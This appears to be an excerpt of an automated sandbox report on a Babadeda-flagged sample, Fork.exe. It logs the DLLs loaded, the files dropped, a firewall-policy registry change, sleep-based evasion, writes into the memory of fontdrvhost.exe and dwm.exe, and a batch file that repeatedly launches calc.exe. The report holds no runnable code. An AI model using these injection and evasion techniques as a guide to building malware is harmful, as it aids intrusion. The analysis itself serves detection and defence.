      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: dataexchange.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.storage.applicationdata.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: logoncli.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.globalization.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.globalization.fontgroups.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: fontgroupsoverride.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.ui.xaml.controls.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.energy.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.graphics.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: winrttracing.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.ui.xaml.phone.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: directmanipulation.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: twinapi.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\calc.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\calc.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\calc.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\calc.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\calc.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\calc.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\calc.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\calc.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\calc.exeSection loaded: ieframe.dll
      Source: C:\Windows\System32\calc.exeSection loaded: netapi32.dll
      Source: C:\Windows\System32\calc.exeSection loaded: version.dll
      Source: C:\Windows\System32\calc.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\calc.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\calc.exeSection loaded: wkscli.dll
      Source: C:\Windows\System32\calc.exeSection loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\calc.exeSection loaded: edputil.dll
      Source: C:\Windows\System32\calc.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\calc.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\calc.exeSection loaded: mlang.dll
      Source: C:\Windows\System32\calc.exeSection loaded: wininet.dll
      Source: C:\Windows\System32\calc.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\calc.exeSection loaded: policymanager.dll
      Source: C:\Windows\System32\calc.exeSection loaded: msvcp110_win.dll
      Source: C:\Windows\System32\calc.exeSection loaded: twinui.appcore.dll
      Source: C:\Windows\System32\calc.exeSection loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\calc.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\calc.exeSection loaded: execmodelproxy.dll
      Source: C:\Windows\System32\calc.exeSection loaded: mrmcorer.dll
      Source: C:\Windows\System32\calc.exeSection loaded: windows.staterepositorycore.dll
      Source: C:\Windows\System32\calc.exeSection loaded: appxdeploymentclient.dll
      Source: C:\Windows\System32\calc.exeSection loaded: bcp47mrm.dll
      Source: C:\Windows\System32\calc.exeSection loaded: windows.ui.dll
      Source: C:\Windows\System32\calc.exeSection loaded: windowmanagementapi.dll
      Source: C:\Windows\System32\calc.exeSection loaded: textinputframework.dll
      Source: C:\Windows\System32\calc.exeSection loaded: inputhost.dll
      Source: C:\Windows\System32\calc.exeSection loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\calc.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\calc.exeSection loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\calc.exeSection loaded: coreuicomponents.dll
      Source: C:\Windows\System32\calc.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\calc.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\calc.exeSection loaded: coreuicomponents.dll
      Source: C:\Windows\System32\calc.exeSection loaded: ntmarta.dll
      Source: C:\Windows\System32\calc.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\calc.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\calc.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\calc.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\calc.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\calc.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\calc.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\calc.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\calc.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\calc.exeSection loaded: ieframe.dll
      Source: C:\Windows\System32\calc.exeSection loaded: netapi32.dll
      Source: C:\Windows\System32\calc.exeSection loaded: version.dll
      Source: C:\Windows\System32\calc.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\calc.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\calc.exeSection loaded: wkscli.dll
      Source: C:\Windows\System32\calc.exeSection loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\calc.exeSection loaded: edputil.dll
      Source: C:\Windows\System32\calc.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\calc.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\calc.exeSection loaded: mlang.dll
      Source: C:\Windows\System32\calc.exeSection loaded: wininet.dll
      Source: C:\Windows\System32\calc.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\calc.exeSection loaded: policymanager.dll
      Source: C:\Windows\System32\calc.exeSection loaded: msvcp110_win.dll
      Source: C:\Windows\System32\calc.exeSection loaded: twinui.appcore.dll
      Source: C:\Windows\System32\calc.exeSection loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\calc.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\calc.exeSection loaded: execmodelproxy.dll
      Source: C:\Windows\System32\calc.exeSection loaded: mrmcorer.dll
      Source: C:\Windows\System32\calc.exeSection loaded: windows.staterepositorycore.dll
      Source: C:\Windows\System32\calc.exeSection loaded: appxdeploymentclient.dll
      Source: C:\Windows\System32\calc.exeSection loaded: bcp47mrm.dll
      Source: C:\Windows\System32\calc.exeSection loaded: windows.ui.dll
      Source: C:\Windows\System32\calc.exeSection loaded: windowmanagementapi.dll
      Source: C:\Windows\System32\calc.exeSection loaded: textinputframework.dll
      Source: C:\Windows\System32\calc.exeSection loaded: inputhost.dll
      Source: C:\Windows\System32\calc.exeSection loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\calc.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\calc.exeSection loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\calc.exeSection loaded: coreuicomponents.dll
      Source: C:\Windows\System32\calc.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\calc.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\calc.exeSection loaded: coreuicomponents.dll
      Source: C:\Windows\System32\calc.exeSection loaded: ntmarta.dll
      Source: C:\Windows\System32\calc.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\calc.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\calc.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\calc.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\calc.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\calc.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\calc.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\calc.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\calc.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\calc.exeSection loaded: ieframe.dll
      Source: C:\Windows\System32\calc.exeSection loaded: netapi32.dll
      Source: C:\Windows\System32\calc.exeSection loaded: version.dll
      Source: C:\Windows\System32\calc.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\calc.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\calc.exeSection loaded: wkscli.dll
      Source: C:\Windows\System32\calc.exeSection loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\calc.exeSection loaded: edputil.dll
      Source: C:\Windows\System32\calc.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\calc.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\calc.exeSection loaded: mlang.dll
      Source: C:\Windows\System32\calc.exeSection loaded: wininet.dll
      Source: C:\Windows\System32\calc.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\calc.exeSection loaded: policymanager.dll
      Source: C:\Windows\System32\calc.exeSection loaded: msvcp110_win.dll
      Source: C:\Windows\System32\calc.exeSection loaded: twinui.appcore.dll
      Source: C:\Windows\System32\calc.exeSection loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\calc.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\calc.exeSection loaded: execmodelproxy.dll
      Source: C:\Windows\System32\calc.exeSection loaded: mrmcorer.dll
      Source: C:\Windows\System32\calc.exeSection loaded: windows.staterepositorycore.dll
      Source: C:\Windows\System32\calc.exeSection loaded: appxdeploymentclient.dll
      Source: C:\Windows\System32\calc.exeSection loaded: bcp47mrm.dll
      Source: C:\Windows\System32\calc.exeSection loaded: windows.ui.dll
      Source: C:\Windows\System32\calc.exeSection loaded: windowmanagementapi.dll
      Source: C:\Windows\System32\calc.exeSection loaded: textinputframework.dll
      Source: C:\Windows\System32\calc.exeSection loaded: inputhost.dll
      Source: C:\Windows\System32\calc.exeSection loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\calc.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\calc.exeSection loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\calc.exeSection loaded: coreuicomponents.dll
      Source: C:\Windows\System32\calc.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\calc.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\calc.exeSection loaded: coreuicomponents.dll
      Source: C:\Users\user\Desktop\Fork.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\Fork.exeFile written: C:\Windows\system.iniJump to behavior
      Source: C:\Windows\System32\calc.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociationsJump to behavior

      Data Obfuscation

      barindex
      Yara detected Babadeda
      Source: Yara matchFile source: Fork.exe, type: SAMPLE
      Source: Yara matchFile source: 0.0.Fork.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Fork.exeStatic PE information: section name: .code
      Source: Fork.exeStatic PE information: section name: .rsrc entropy: 7.769782214367897
      Source: winrhbwc.exe.0.drStatic PE information: section name: .text entropy: 7.991470433119
      Source: doxt.pif.0.drStatic PE information: section name: .text entropy: 7.991470433119

      Persistence and Installation Behavior

      barindex
      Drops PE files with a suspicious file extension
      Source: C:\Users\user\Desktop\Fork.exeFile created: C:\doxt.pifJump to dropped file
      Source: C:\Users\user\Desktop\Fork.exeFile created: C:\Users\user\AppData\Local\Temp\winrhbwc.exeJump to dropped file
      Source: C:\Users\user\Desktop\Fork.exeFile created: C:\doxt.pifJump to dropped file
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfileJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeThread delayed: delay time: 180000Jump to behavior
      Source: C:\Users\user\Desktop\Fork.exeThread delayed: delay time: 300000Jump to behavior
      Source: C:\Users\user\Desktop\Fork.exeThread delayed: delay time: 360000Jump to behavior
      Source: C:\Users\user\Desktop\Fork.exeThread delayed: delay time: 2100000Jump to behavior
      Source: C:\Users\user\Desktop\Fork.exeThread delayed: delay time: 2400000Jump to behavior
      Source: C:\Users\user\Desktop\Fork.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\winrhbwc.exeJump to dropped file
      Source: C:\Users\user\Desktop\Fork.exeDropped PE file which has not been started: C:\doxt.pifJump to dropped file
      Source: C:\Users\user\Desktop\Fork.exe TID: 7136Thread sleep time: -120000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Fork.exe TID: 7144Thread sleep time: -180000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Fork.exe TID: 7160Thread sleep time: -300000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Fork.exe TID: 7116Thread sleep count: 43 > 30Jump to behavior
      Source: C:\Users\user\Desktop\Fork.exe TID: 7152Thread sleep time: -40000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Fork.exe TID: 6872Thread sleep time: -140000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Fork.exe TID: 6872Thread sleep time: -147000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Fork.exe TID: 6868Thread sleep time: -720000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Fork.exe TID: 6868Thread sleep time: -320000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Fork.exe TID: 7144Thread sleep time: -8400000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Fork.exe TID: 7160Thread sleep time: -9600000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\Fork.exeThread delayed: delay time: 120000Jump to behavior
      Source: C:\Users\user\Desktop\Fork.exeThread delayed: delay time: 180000Jump to behavior
      Source: C:\Users\user\Desktop\Fork.exeThread delayed: delay time: 300000Jump to behavior
      Source: C:\Users\user\Desktop\Fork.exeThread delayed: delay time: 360000Jump to behavior
      Source: C:\Users\user\Desktop\Fork.exeThread delayed: delay time: 2100000Jump to behavior
      Source: C:\Users\user\Desktop\Fork.exeThread delayed: delay time: 2400000Jump to behavior
      Source: C:\Users\user\Desktop\Fork.exeFile opened: C:\Users\user\AppData\Jump to behavior
      Source: C:\Users\user\Desktop\Fork.exeFile opened: C:\Users\user\AppData\Local\Temp\6028.tmp\6029.tmp\602A.tmpJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
      Source: C:\Users\user\Desktop\Fork.exeFile opened: C:\Users\user\AppData\Local\Temp\6028.tmpJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeFile opened: C:\Users\user\AppData\Local\Temp\6028.tmp\6029.tmpJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeFile opened: C:\Users\user\Jump to behavior
      Source: dwm.exe, 0000000B.00000000.1016198831.0000013D2CB51000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000%
      Source: dwm.exe, 0000000B.00000000.1016198831.0000013D2CAF0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
      Source: C:\Users\user\Desktop\Fork.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Allocates memory in foreign processes
      Source: C:\Users\user\Desktop\Fork.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: E20000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: D00000 protect: page execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeMemory allocated: C:\Windows\System32\dwm.exe base: 3D0000 protect: page execute and read and writeJump to behavior
      Writes to foreign memory regions
      Source: C:\Users\user\Desktop\Fork.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: E20000Jump to behavior
      Source: C:\Users\user\Desktop\Fork.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: D00000Jump to behavior
      Source: C:\Users\user\Desktop\Fork.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\6028.tmp\6029.tmp\602A.bat C:\Users\user\Desktop\Fork.exe"Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
